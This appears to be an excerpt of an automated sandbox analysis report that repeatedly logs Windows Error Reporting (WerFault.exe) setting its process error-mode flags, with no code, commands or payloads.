                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
